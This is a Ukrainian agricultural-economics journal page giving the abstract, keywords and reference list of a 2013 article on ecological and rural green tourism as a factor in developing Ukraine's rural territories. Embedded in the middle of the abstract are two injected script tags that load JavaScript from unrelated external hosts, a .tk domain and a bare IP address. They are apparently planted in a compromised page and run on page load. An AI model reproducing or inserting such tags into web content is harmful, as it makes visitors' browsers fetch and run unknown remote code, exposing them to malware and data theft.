ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 332.122:338.43
Розвиток сільських територій і соціальна сфера села

Екологічний туризм як чинник розвитку сільських територій України / Куліш І. М. // Економіка АПК. - 2013. - № 2 - С. 80

Проаналізовано функціонування екологічного (зеленого) туризму в Україні та його вплив на підвищення конкурентоспроможності сільських територій. Показана необхідність взаємовигідної співпраці органів державної влади і підприємств екологічного туризму. Визначено, що сільський ту­ризм, при потужній ресурсній базі, не має широкого поширення й не означені перспективи його роз­витку. Наголошено на необхідності вивчення досвіду функціонування підприємств сільського ту­ризму в Європі з метою використання позитивних напрацювань для розвитку сільських територій України. Табл.: 1. Бібліогр.: 17.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: екологічний (зелений) туризм, сільський туризм, сільські території, конкурентоспроможність, підприємництво

Список використаних джерел

 1. Кравців В. С. Європейська стратегія розвитку туризму в гірських районах: орієнтація на гармонійність / В. С. Кравців, Ю. І. Стадницький // Наук. вісн. Чернівецького ун-ту. 36. наук. праць. - Вип. 205. - Економіка. - Чернівці: Рута, 2004. - С. 71-76.
 2. Кабушкин Н. И. Менеджмент туризма: учеб. пособие / Н. И. Кабушкин. - Мн. : БГЭУ, 1999. - 644 с.
 3. Квартальное В. А. Стратегический менеджмент в туризме: современный опыт управления / В. С. Квартальное. - М.: «Финансы и статистика», 1999.- 496 с.
 4. Чудновский А. Д. Туризм и гостиничное хозяйство / А. Д. Чудновский.- М.: «Юркнига», 2005.- 448 с.
 5. Скобкин С. С. Практика сервиса в индустрии гостеприимства и туризма / С. С. Скобкин. - М.: ООО Издательство МАГИСТР, 2007. - 496 с.
 6. РутинськийМ. И. Замковий туризм в Україні: навч. посіб. / М. И. Рутинський. - К.: Центр учбової літератури, 2007.- 424 с.
 7. Ceballos-Lascurain H. Tourism, ecotourism and protected areas / Hector Ceballos Lascurain.- Cambridge : IUCN Publications Services Unit, 1996. - 301 p.
 8. Про туризм : Закон України від 15.09.1995 № 324/95-ВР // Відом. Верхов. Ради України (ВВР). - 1995. - № 31. - Ст. 241.
 9. Воскресенский В. Ю. Международный туризм / В. Ю. Воскресенский. - М. : ЮНИТИ-ДАНА, 2006. - 256 с.
 10. Заповідники та національні природні парки України у 2011 році: стат. бюл. / Державна служба статистики України. - К.: Державна служба статистики України, 2012. - 24 с.
 11. Каким быть природно-заповедному фонду Крыма и сколько денег надо выделить аграриям [Електронний ресурс]. - Режим доступу: http://agroua.net/news/news_14125.html.
 12. Регіони України 2011 : стат. зб. [ за ред. О. Г. Осауленка] у 2-х ч. 4.2 / Державна служба статистики України. - К.: Державна служба статистики України, 2011. - 784 с.
 13. WWOOF - World Wide Opportunities on Organic Farms [Electronic resourse]. - Access mode : http://www.wwoof.org//
 14. WWOOF in Ukraine [Electronic resourse]. - Access mode : http://www.expat-blog.com/en/classifieds/europe/ukraine/wwoof.html.
 15. Сільський зелений туризм [Електронний ресурс]. - Режим доступу : http://www.greentour.com.ua/ukrainian/1/.
 16. A brief history of WWOOF [Електронний ресурс]. - Режим доступу : http://www.wwoof.org/history.asp.
 17. Основные принципы экотуризма [Електронний ресурс]. - Режим доступу :http://www.wwf.ru/about/what_we_do/reserves/info/ecotour/doc1274/page1.
Читати статтю: 13_02_14.pdf